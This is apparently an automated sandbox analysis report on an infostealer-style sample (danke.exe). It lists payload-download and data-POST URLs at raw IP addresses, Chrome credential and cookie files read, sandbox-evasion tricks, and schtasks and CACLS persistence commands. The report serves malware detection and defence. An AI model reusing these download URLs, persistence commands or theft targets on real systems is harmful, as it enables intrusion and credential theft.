an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1604952 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1605284 registers.edx: 1605308 registers.ebx: 1605308 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1603392 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1603724 registers.edx: 1603748 registers.ebx: 1603748 registers.esi: 5762616 registers.ecx: 2768961536	1
__exception__ July 18, 2023, 7:17 a.m.	stacktrace: KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 an+0x18b92 @ 0x418b92 an+0x1019 @ 0x401019 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x3d4b00 registers.esp: 1601832 registers.edi: 4660320 registers.eax: 4016896 registers.ebp: 1602164 registers.edx: 1602188 registers.ebx: 1602188 registers.esi: 5762616 registers.ecx: 2768961536	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://77.91.68.3/home/love/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.31/new/foto135.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.31/new/fotod25.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.31/anon/an.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.3/home/love/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.3/home/love/Plugins/clip64.dll

Performs some HTTP requests (6 events)

request	POST http://77.91.68.3/home/love/index.php
request	GET http://77.91.124.31/new/foto135.exe
request	GET http://77.91.124.31/new/fotod25.exe
request	GET http://77.91.124.31/anon/an.exe
request	GET http://77.91.68.3/home/love/Plugins/cred64.dll
request	GET http://77.91.68.3/home/love/Plugins/clip64.dll

Sends data using the HTTP POST Method (1 event)

request

POST http://77.91.68.3/home/love/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 311 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73261000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73741000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d81000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73261000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ca1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72bd4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ca2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d11000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75b71000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 7:17 a.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000004640000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73741000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x723c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75b71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x723b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73251000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4ee3000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000c20000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000d20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef406a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3985000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef406b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002370000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000024c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39d4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 18, 2023, 7:16 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (1 event)

description

danke.exe tried to sleep 142 seconds, actually delayed analysis time by 142 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (12 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW July 18, 2023, 7:16 a.m.	number_of_free_clusters: 3253370 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 18, 2023, 7:16 a.m.	number_of_free_clusters: 3253370 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 18, 2023, 7:16 a.m.	number_of_free_clusters: 3253267 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 18, 2023, 7:16 a.m.	number_of_free_clusters: 3253267 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 18, 2023, 7:16 a.m.	number_of_free_clusters: 3252103 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 18, 2023, 7:16 a.m.	number_of_free_clusters: 3252103 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 18, 2023, 7:16 a.m.	number_of_free_clusters: 3252000 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 18, 2023, 7:16 a.m.	number_of_free_clusters: 3252000 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 18, 2023, 7:16 a.m.	number_of_free_clusters: 3251724 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 18, 2023, 7:16 a.m.	number_of_free_clusters: 3251724 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 18, 2023, 7:16 a.m.	number_of_free_clusters: 3251621 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 18, 2023, 7:16 a.m.	number_of_free_clusters: 3251621 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1

Steals private information from local Internet browsers (6 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Creates executable files on the filesystem (17 events)

file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\l6081493.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\g4433902.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\h6179776.exe
file	C:\Users\test22\AppData\Local\Temp\IXP005.TMP\k2044326.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\j2330856.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\g9947983.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\n8171002.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\x4582761.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\x8494693.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\h8269822.exe
file	C:\Users\test22\AppData\Local\Temp\1000030051\foto135.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\j7679413.exe
file	C:\Users\test22\AppData\Local\Temp\1000031051\fotod25.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\y3722656.exe
file	C:\Users\test22\AppData\Local\Temp\1000032051\an.exe

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y\|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe
file	C:\Users\test22\AppData\Local\Temp\1000030051\foto135.exe
file	C:\Users\test22\AppData\Local\Temp\1000031051\fotod25.exe
file	C:\Users\test22\AppData\Local\Temp\1000032051\an.exe

Drops an executable to the user AppData folder (9 events)

file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\n8171002.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\1000032051\an.exe
file	C:\Users\test22\AppData\Local\Temp\1000031051\fotod25.exe
file	C:\Users\test22\AppData\Local\Temp\1000030051\foto135.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\j2330856.exe
file	C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\x4582761.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\y3722656.exe

A process created a hidden window (7 events)

Time & API	Arguments	Status	Return
ShellExecuteExW July 18, 2023, 7:16 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe	1	1
